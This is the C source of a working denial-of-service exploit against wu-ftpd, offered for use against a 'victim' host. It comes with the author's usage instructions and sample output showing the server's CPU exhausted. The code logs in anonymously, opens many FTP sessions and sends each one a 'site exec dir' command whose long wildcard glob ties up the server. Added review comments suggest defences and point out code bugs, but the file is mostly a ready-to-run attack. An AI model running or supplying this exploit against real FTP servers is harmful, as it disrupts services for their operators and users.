Exploit for wu-ftpd that makes use of the globbing denial of service flaw.
77b446fb929c57c3b6eb8452ee7f7f4034c86535094cd0eb6f01b548f2c92aea
/*
* Exploit for wu-ftpd all versions by pi3 (pi3ki31ny).
*
* How to use? To see the effect it is enough to run a single process of this exploit. Example:
*
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# cc p_wu.c -o p_wu
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu
*
*
* ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
*
* [*] Ussage: ./p_wu [options]
*
* Options:
*
* -v <victims hostname>
* -o [ port - standard -> 21 ]
* -l [ login - standard -> ftp ]
* -p [ password - standard -> daj@na.wino ]
* -i [ how many connections - standard -> 15 ]
* -c [ directory - standard -> don't change ]
* -h This stupid help screen...
*
*
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu -v 0
*
*
* ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
*
* [*] Connected to: 0
* [*] Banner: 220 darkstar.example.net FTP server (Version wu-2.6.2(1) Fri Oct 22 02:54:53 CEST 2004) ready.
* [*] Sending USER: ftp... OK!
* [*] Sending PASS: daj@na.wino... OK!
* [*] Sending evil command... OK! < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 >
*
*
* root@dpi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ps aux |grep ftpd
* ftp 1592 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1594 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1596 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1598 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1600 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1602 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1604 6.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1606 6.7 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1608 6.5 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1610 6.3 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1612 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1614 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1616 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1618 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1620 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd#
*
* As we can see, wu-ftpd ate all the free CPU power... and that was with only 15 connections.
* I get a very good effect when running ~20 - ~30 sessions; after that my system
* works very slowly (in practice I can't do anything! - use option -i to change how many times the sploit
* will connect to the server and use the bug).
*
* Btw. Try always to change directory where is more files / directories it's better for sploit ;-)
*
* Ok. Thanks for read this shit and let's go to ate CPU power! ;-)
*
* Special greetz: appelast
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <getopt.h>
#define TRUE 1
#define FALSE 0
#define FAL_EX -1
#define BUFS 210
#define PORT 21
#define LOGN "ftp"
#define PASS "daj@na.wino"
#define SA struct sockaddr
#define pi3 TRUE
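/*
 * Check whether an FTP reply starts with the status code expected for a
 * given step of the dialogue.
 *
 * mode selects the expected three-digit code:
 *   1 -> "331", 2 -> "230", 3 -> "200", 4 -> "250".
 * ans is the raw reply text; only its first three characters are compared.
 *
 * Returns 1 (the file's TRUE) when the reply starts with the expected
 * code and 0 (the file's FALSE) otherwise. An unknown mode or a NULL
 * reply also yields 0; the original fell off the end of the function
 * without a return value for any mode outside 1..4, which is undefined
 * behaviour once the caller reads the result.
 */
int vrfy(int mode, char *ans) {
    const char *expected = NULL;

    switch (mode) {
    case 1:
        expected = "331";
        break;
    case 2:
        expected = "230";
        break;
    case 3:
        expected = "200";
        break;
    case 4:
        expected = "250";
        break;
    default:
        /* Unknown step: there is no code to compare against. */
        break;
    }

    if (expected == NULL || ans == NULL)
        return 0;

    /* The comparison result is already 1 or 0, matching TRUE / FALSE. */
    return strncmp(ans, expected, 3) == 0;
}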
/*
 * Print the command-line help to stdout and terminate the process with
 * status FAL_EX. This function does not return.
 *
 * arg: program name shown in the usage line (main passes argv[0]).
 */
void ussage(char *arg) {
    /* One entry per option line, printed in this order. */
    static const char *const option_help[] = {
        "\t\t-v <victims hostname>\n",
        "\t\t-o [ port - standard -> 21 ]\n",
        "\t\t-l [ login - standard -> ftp ]\n",
        "\t\t-p [ password - standard -> daj@na.wino ]\n",
        "\t\t-i [ how many connections - standard -> 15 ]\n",
        "\t\t-c [ directory - standard -> don't change ]\n",
        "\t\t-h This stupid help screen...\n\n\n",
    };
    size_t idx;

    fputs("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) "
          "]=- :::...\n", stdout);
    printf("\n\t\t[*] Ussage: %s [options]\n\n", arg);
    fputs("\tOptions:\n\n", stdout);

    for (idx = 0; idx < sizeof option_help / sizeof option_help[0]; idx++)
        fputs(option_help[idx], stdout);

    exit(FAL_EX);
}
/*
 * Entry point of the proof-of-concept client.
 *
 * Parses the command-line options, then opens `howmuch` FTP control
 * connections one after another. On each connection it reads the banner,
 * sends USER and PASS, optionally sends CWD, and finally sends one
 * "site exec dir" request whose argument is 192 '*' characters followed
 * by ".*". The reply to that last request is never read and the socket
 * is never closed, so every connection stays open until the process exits.
 *
 * Exits with FAL_EX on any socket, read, write or reply-code failure;
 * otherwise returns pi3 (defined as TRUE).
 *
 * NOTE(review, defensive): what a server operator would see from this
 * client is a burst of sessions that each log in (default credentials
 * "ftp" / "daj@na.wino" unless overridden) and then issue a single
 * SITE EXEC request whose argument is a long run of '*' characters.
 * Logging or alerting on SITE EXEC arguments with many consecutive
 * wildcards, capping concurrent sessions per client, and putting CPU
 * limits on the per-session daemon processes are the usual ways to
 * contain this class of globbing exhaustion. Whether a given build is
 * affected has to be checked against the vendor advisory for that build.
 */
int main(int argc, char *argv[]) {
/* buf holds the final request; tmp_buf is reused for every other request and reply. */
/* `line` and `pid` are declared but not used anywhere in this function. */
char buf[BUFS],line[100],tmp_buf[200],*login=LOGN,*pass=PASS,*victim=NULL,*cwd=NULL;
long inet;
int pid,sockfd,i,port=PORT,opt=FALSE,ret_vrfy=FALSE,tmp,howmuch=15;
struct sockaddr_in servaddr;
struct hostent *h;
/* With no arguments at all, print the help text and exit. */
if (argc<2)
ussage(argv[FALSE]);
/* getopt() returns -1 (FAL_EX) once all options have been consumed. */
while((opt = getopt(argc,argv,"v:o:l:p:c:i:h")) != FAL_EX) {
switch(opt) {
case 'v':
victim=optarg;
if ( (h=gethostbyname((char*)optarg)) == NULL) {
printf("Gethostbyname() field!\n");
exit(FAL_EX);
}
/* Copy the first four bytes of the resolved address into `inet`. */
memcpy (&inet, h->h_addr, 4);
break;
case 'o':
/* NOTE(review): atoi() gives no error indication; the port is not range-checked. */
port=atoi(optarg);
break;
case 'l':
login=optarg;
break;
case 'p':
pass=optarg;
break;
case 'c':
cwd=optarg;
break;
case 'i':
/* NOTE(review): the connection count is taken from atoi() without validation. */
howmuch=atoi(optarg);
break;
case 'h':
default:
ussage(argv[FALSE]);
break;
}
}
/* Fill in the socket address: IPv4, the chosen port in network byte order, INADDR_ANY as the address. */
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
/*
 * Build the final request once, before the loop: a 14-character prefix,
 * 192 '*' characters and the 3-character tail ".*\n". Together with the
 * terminator that is exactly BUFS (210) bytes; the earlier bzero() is what
 * leaves buf terminated after the fill loop so that strcat() can append.
 */
bzero(buf,sizeof(buf));
strcpy(buf,"site exec dir ");
for (i=FALSE;i<192;i++)
buf[14+i] = '*';
strcat(buf,".*\n");
/*
 * One iteration per connection. Progress text is printed only on the
 * first iteration (tmp == FALSE); later iterations only append their
 * sequence number to the output line.
 */
for (tmp=FALSE;tmp<howmuch;tmp++) {
if ( (sockfd=socket(AF_INET,SOCK_STREAM,FALSE)) <FALSE ) {
printf("Socket() error!\n");
exit(FAL_EX);
}
if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) <FALSE ) {
printf("Connect() error!\n");
exit(FAL_EX);
}
if (tmp==FALSE) {
printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
printf("\n\t[*] Connected to: %s\n",victim);
}
/* Read the server banner. */
bzero(tmp_buf,sizeof(tmp_buf));
i=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host baner...\nExiting...\n\n");
exit(FAL_EX);
}
/*
 * Drop the last character of the banner before printing it.
 * NOTE(review): read() may fill all 200 bytes and leave tmp_buf without a
 * terminator for strlen(), and an empty read makes the index strlen()-1
 * wrap around. Both are out-of-bounds accesses driven by what the peer
 * sends; the same unterminated-buffer concern applies to the later reads.
 */
tmp_buf[strlen(tmp_buf)-1]='\0';
if (tmp==FALSE)
printf("\t[*] Banner: %s\n",tmp_buf);
/* USER step. */
bzero(tmp_buf,sizeof(tmp_buf));
snprintf(tmp_buf,sizeof(tmp_buf),"USER %s\n",login);
if (tmp==FALSE)
printf("\t[*] Sending USER: %s... ",login);
i=FALSE;
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host login...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
/* vrfy mode 1 checks for a 331 reply, although the message below says 230. */
if ( (ret_vrfy=vrfy(TRUE,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
if (tmp==FALSE)
printf("\t\tOK!\n");
/* PASS step. */
i=FALSE,bzero(tmp_buf,sizeof(tmp_buf));
snprintf(tmp_buf,sizeof(tmp_buf),"PASS %s\n",pass);
if (tmp==FALSE)
printf("\t[*] Sending PASS: %s... ",pass);
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host password...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
/* vrfy mode 2 (TRUE+1) checks for a 230 reply. */
if ( (ret_vrfy=vrfy(TRUE+1,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if (tmp==FALSE)
printf("\tOK!\n");
/* Optional CWD step, taken only when -c was given. */
if (cwd!=NULL) {
snprintf(tmp_buf,sizeof(tmp_buf),"CWD %s\n",cwd);
if (tmp==FALSE)
printf("\t[*] Changing directory: %s... ",cwd);
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host change directory...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
/* vrfy mode 4 (TRUE+3) checks for a 250 reply. */
if ( (ret_vrfy=vrfy(TRUE+3,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 250!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if (tmp==FALSE)
printf("\tOK!\n");
}
if (tmp==FALSE)
printf("\t[*] Sending evil command...");
/*
 * Send the request prepared in buf. The reply is not read and sockfd is
 * not closed, so the session is left open while the loop moves on to the
 * next connection.
 */
if ( (i=write(sockfd,buf,strlen(buf))) == FAL_EX) {
printf("I can\'t write to source host evil command...\nExiting...\n\n");
exit(FAL_EX);
}
/* The first iteration opens the "< 1 2 3 ..." list; later ones append their number. */
if (tmp==FALSE)
printf("\t\tOK! < %d",tmp+1);
if (tmp!=FALSE)
printf(" %d",tmp+1);
}
printf(" >\n\n\n");
/* pi3 is defined as TRUE, so the process exit status is 1 on this path. */
return pi3;
}